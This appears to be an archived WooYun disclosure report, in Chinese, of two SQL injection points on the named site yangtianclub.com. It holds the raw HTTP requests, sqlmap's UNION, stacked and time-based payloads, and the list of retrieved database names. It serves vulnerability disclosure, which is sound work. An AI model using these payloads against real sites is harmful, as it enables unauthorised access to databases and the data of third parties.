乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-26: 细节已通知厂商并且等待厂商处理中 2015-10-26: 厂商已经确认,细节仅向厂商公开 2015-11-05: 细节向核心白帽子及相关领域专家公开 2015-11-15: 细节向普通白帽子公开 2015-11-25: 细节向实习白帽子公开 2015-12-10: 细节向公众公开
网站:www.yangtianclub.com2个注入点
GET /goodList.aspx?cid=2 HTTP/1.1Referer: http://www.yangtianclub.com/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5X-Forwarded-For: 127.0.0.1Host: www.yangtianclub.comCookie: ASP.NET_SessionId=j5l4sz450gnnlvewppbthwmr; ActivityShoppingCart=820|1; 935|1=; 830|1=; 850|1=; 841|1=; LastShoppingCart=3Accept-Encoding: gzip, deflatePOST /common/memberActivity.ashx HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5Accept: application/json, text/javascript, */*Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5Content-Type: application/x-www-form-urlencodedOrigin: http://www.yangtianclub.comReferer: http://www.yangtianclub.com/memberActive.aspxX-Requested-With: XMLHttpRequestCache-Control: no-cacheX-Forwarded-For: 127.0.0.1Host: www.yangtianclub.comCookie: ActivityShoppingCart=; 935|1=; 830|1=; 850|1=; 841|1=; LastShoppingCart=3; 959=; 834=; 958=; 847=; 816=; 841=; 827=; 811|1=; 923|1=; 828|1=; 825|1=; 821|1=; 923|3=Content-Length: 9Accept-Encoding: gzip, deflateusercode=
数据库
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: cid Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: cid=-5121' UNION ALL SELECT CHAR(113)+CHAR(115)+CHAR(119)+CHAR(112)+CHAR(113)+CHAR(79)+CHAR(103)+CHAR(117)+CHAR(81)+CHAR(97)+CHAR(103)+CHAR(68)+CHAR(115)+CHAR(72)+CHAR(73)+CHAR(113)+CHAR(103)+CHAR(97)+CHAR(119)+CHAR(113)-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: cid=2'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: cid=2' WAITFOR DELAY '0:0:5'-----[03:52:52] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windowsweb application technology: ASP.NET, Nginx, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005[03:52:52] [INFO] fetching database names[03:52:52] [WARNING] reflective value(s) found and filtering out[03:52:52] [INFO] the SQL query used returns 15 entries[03:52:52] [INFO] retrieved: "abcprodb"[03:52:53] [INFO] retrieved: "airchinacodeshopnew"[03:52:53] [INFO] retrieved: "airchinacodeshopprodb"[03:52:53] [INFO] retrieved: "airchinaprodb"[03:52:53] [INFO] retrieved: "airchinav2db"[03:52:54] [INFO] retrieved: "AirVirtualGoodsDB"[03:52:54] [INFO] retrieved: "distribution"[03:52:54] [INFO] retrieved: "jjprodb"[03:52:54] [INFO] retrieved: "master"[03:52:55] [INFO] retrieved: "model"[03:52:55] [INFO] retrieved: "msdb"[03:52:55] [INFO] retrieved: "nlprodb"[03:52:55] [INFO] retrieved: "qqprodb"[03:52:56] [INFO] retrieved: "tempdb"[03:52:56] [INFO] retrieved: "ytprodb"available databases [15]: [*] abcprodb[*] airchinacodeshopnew[*] airchinacodeshopprodb[*] airchinaprodb[*] airchinav2db[*] AirVirtualGoodsDB[*] distribution[*] jjprodb[*] master[*] model[*] msdb[*] nlprodb[*] qqprodb[*] tempdb[*] ytprodb
危害等级:高
漏洞Rank:12
确认时间:2015-10-26 11:41
感谢您对联想信息安全工作的关注与支持!
暂无